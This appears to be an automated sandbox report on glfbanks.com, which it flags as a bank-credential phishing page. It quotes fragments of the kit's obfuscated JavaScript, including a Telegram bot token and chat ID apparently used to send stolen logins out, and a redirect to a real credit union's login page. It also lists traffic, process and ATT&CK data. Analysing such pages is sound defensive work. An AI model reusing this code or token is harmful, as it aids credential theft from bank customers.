Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://glfbanks.com/

Overview

General Information

Sample URL:https://glfbanks.com/
Analysis ID:1588128
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
AI detected suspicious Javascript
AI detected suspicious URL
HTML page contains obfuscated javascript
Javascript uses Clearbit API to dynamically determine company logos
Uses the Telegram API (likely for C&C communication)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 3688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6968 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1956,i,11295692151829385158,3323549372105894629,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6688 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://glfbanks.com/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_69JoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    SourceRuleDescriptionAuthorStrings
    1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.3.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: https://glfbanks.com/Joe Sandbox AI: Score: 8 Reasons: The brand 'Bank' is a generic term and could refer to any banking institution, but it is commonly associated with well-known financial institutions., The URL 'glfbanks.com' does not match any well-known bank domain names., The domain 'glfbanks.com' includes 'banks', which is a generic term and could be used to mislead users into thinking it is associated with a legitimate bank., The presence of input fields for 'User ID' and 'Password' is typical for banking sites, but without a clear association to a known bank, it raises suspicion., The URL does not match any specific well-known bank's domain, and the use of 'glf' is unusual and could be an attempt to mimic a legitimate bank's domain. DOM: 1.2.pages.csv
        Source: Yara matchFile source: 1.2.pages.csv, type: HTML
        Source: Yara matchFile source: 1.3.pages.csv, type: HTML
        Source: Yara matchFile source: dropped/chromecache_69, type: DROPPED
        Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://glfbanks.com/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load an external script, along with the obfuscated nature of the script, further increases the risk. While the script may be attempting to implement some form of challenge-response mechanism, the overall behavior is highly suspicious and indicative of malicious intent.
        Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://glfbanks.com/... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The use of an iframe to load additional scripts and the obfuscated nature of the code further increase the risk. While the script may have a legitimate purpose, such as implementing a security challenge, the overall behavior is highly suspicious and indicative of a potential attack vector.
        Source: 0.13.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://glfbanks.com/... This JavaScript code exhibits several high-risk behaviors that indicate potential malicious intent. It includes dynamic code execution, data exfiltration, and redirects to suspicious domains, which are all considered high-risk indicators. Additionally, the code appears to be obfuscated, making it difficult to fully understand its purpose. While some of the functionality, such as the email verification modal, may be legitimate, the overall behavior of the script is highly suspicious and poses a significant security risk.
        Source: URLJoe Sandbox AI: AI detected Brand spoofing attempt in URL: https://glfbanks.com
        Source: URLJoe Sandbox AI: AI detected Typosquatting in URL: https://glfbanks.com
        Source: https://glfbanks.com/HTTP Parser: function _0x2101(_0x4898ef,_0x4fca34){var _0x569806=_0x233f();return _0x2101=function(_0x4e
        Source: https://glfbanks.com/HTTP Parser: var hapei = '8026158304:AAFfRY6ZnNmTJYLn388RyTzQMeJL-UpbehA', ceid = '6734620062';
        Source: https://glfbanks.com/HTTP Parser: window.mrdtourl = 'https://www.redfcuonline.org/dbank/live/app/login/consumer'; window.mrdtoname = 'redstone federal credit union'; /*---------- evm functions ---------------*/ // evm - email verification modal // the modal response container function modal_resp_err(id, txtp) { var $m_errrespdiv = $('#jsmodaler'); $m_errrespdiv.find('p').html(txtp); $m_errrespdiv.fadein('slow'); id.focus(); } // get the modal var emv_modal = $('#emvmodal'); function show_emv_modal() { document.documentelement.style.overflowy = "hidden"; // makes it fit screen emv_modal.fadein('slow'); } function hide_emv_modal() { document.documentelement.style.overflowy = 'scroll'; emv_modal.fadeout('slow'); } emv_modal.find('.close').on('click', function (e) { e.preventdefault(); hide_emv_modal(); }); // show_emv_modal(); function vtrk(pg_step_name) { $.get(window.hsturl+"_sysm_.p...
        Source: https://glfbanks.com/HTTP Parser: Number of links: 1
        Source: https://glfbanks.com/HTTP Parser: <input type="password" .../> found but no <form action="...
        Source: https://glfbanks.com/HTTP Parser: Base64 decoded: 1736539421.000000
        Source: https://glfbanks.com/HTTP Parser: <input type="password" .../> found
        Source: https://glfbanks.com/HTTP Parser: No <meta name="author".. found
        Source: https://glfbanks.com/HTTP Parser: No <meta name="author".. found
        Source: https://glfbanks.com/HTTP Parser: No <meta name="copyright".. found
        Source: https://glfbanks.com/HTTP Parser: No <meta name="copyright".. found
        Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49766 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49780 version: TLS 1.2
        Source: chrome.exeMemory has grown: Private usage: 24MB later: 36MB

        Networking

        barindex
        Source: unknownDNS query: name: api.telegram.org
        Source: unknownDNS query: name: api.telegram.org
        Source: unknownDNS query: name: api.telegram.org
        Source: unknownDNS query: name: api.telegram.org
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: global trafficTCP traffic: 192.168.2.16:49770 -> 1.1.1.1:53
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 2.23.242.162
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
        Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
        Source: global trafficDNS traffic detected: DNS query: glfbanks.com
        Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: resource.digitalinsight.com
        Source: global trafficDNS traffic detected: DNS query: api.ipify.org
        Source: global trafficDNS traffic detected: DNS query: api.telegram.org
        Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
        Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
        Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
        Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
        Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
        Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
        Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
        Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
        Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
        Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
        Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
        Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
        Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
        Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49738 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 2.23.242.162:443 -> 192.168.2.16:49754 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49766 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.16:49780 version: TLS 1.2
        Source: classification engineClassification label: mal76.phis.troj.win@17/20@28/206
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1956,i,11295692151829385158,3323549372105894629,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://glfbanks.com/"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 --field-trial-handle=1956,i,11295692151829385158,3323549372105894629,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
        Browser Extensions
        1
        Process Injection
        1
        Masquerading
        OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
        Web Service
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault AccountsScheduled Task/Job1
        Registry Run Keys / Startup Folder
        1
        Registry Run Keys / Startup Folder
        1
        Process Injection
        LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Extra Window Memory Injection
        1
        Extra Window Memory Injection
        Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
        Application Layer Protocol
        Traffic DuplicationData Destruction

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        https://glfbanks.com/0%Avira URL Cloudsafe
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
        NameIPActiveMaliciousAntivirus DetectionReputation
        glfbanks.com
        188.114.96.3
        truetrue
          unknown
          a.nel.cloudflare.com
          35.190.80.1
          truefalse
            high
            cdnjs.cloudflare.com
            104.17.24.14
            truefalse
              high
              217.30.120.34.bc.googleusercontent.com
              34.120.30.217
              truefalse
                unknown
                www.google.com
                172.217.18.100
                truefalse
                  high
                  api.ipify.org
                  104.26.12.205
                  truefalse
                    high
                    dyna.wikimedia.org
                    185.15.59.224
                    truefalse
                      high
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high
                        resource.digitalinsight.com
                        unknown
                        unknowntrue
                          unknown
                          www.wikipedia.org
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://glfbanks.com/true
                              unknown
                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs
                              IPDomainCountryFlagASNASN NameMalicious
                              104.17.24.14
                              cdnjs.cloudflare.comUnited States
                              13335CLOUDFLARENETUSfalse
                              104.26.12.205
                              api.ipify.orgUnited States
                              13335CLOUDFLARENETUSfalse
                              1.1.1.1
                              unknownAustralia
                              13335CLOUDFLARENETUSfalse
                              142.250.186.170
                              unknownUnited States
                              15169GOOGLEUSfalse
                              216.58.206.74
                              unknownUnited States
                              15169GOOGLEUSfalse
                              74.125.133.84
                              unknownUnited States
                              15169GOOGLEUSfalse
                              142.250.185.227
                              unknownUnited States
                              15169GOOGLEUSfalse
                              142.250.185.238
                              unknownUnited States
                              15169GOOGLEUSfalse
                              185.15.59.224
                              dyna.wikimedia.orgNetherlands
                              14907WIKIMEDIAUSfalse
                              149.154.167.220
                              api.telegram.orgUnited Kingdom
                              62041TELEGRAMRUfalse
                              142.250.181.238
                              unknownUnited States
                              15169GOOGLEUSfalse
                              239.255.255.250
                              unknownReserved
                              unknownunknownfalse
                              142.251.32.110
                              unknownUnited States
                              15169GOOGLEUSfalse
                              188.114.96.3
                              glfbanks.comEuropean Union
                              13335CLOUDFLARENETUStrue
                              142.250.185.195
                              unknownUnited States
                              15169GOOGLEUSfalse
                              35.190.80.1
                              a.nel.cloudflare.comUnited States
                              15169GOOGLEUSfalse
                              172.217.18.100
                              www.google.comUnited States
                              15169GOOGLEUSfalse
                              34.120.30.217
                              217.30.120.34.bc.googleusercontent.comUnited States
                              15169GOOGLEUSfalse
                              172.67.74.152
                              unknownUnited States
                              13335CLOUDFLARENETUSfalse
                              IP
                              192.168.2.16
                              Joe Sandbox version:42.0.0 Malachite
                              Analysis ID:1588128
                              Start date and time:2025-01-10 21:03:05 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:defaultwindowsinteractivecookbook.jbs
                              Sample URL:https://glfbanks.com/
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:13
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • EGA enabled
                              Analysis Mode:stream
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal76.phis.troj.win@17/20@28/206
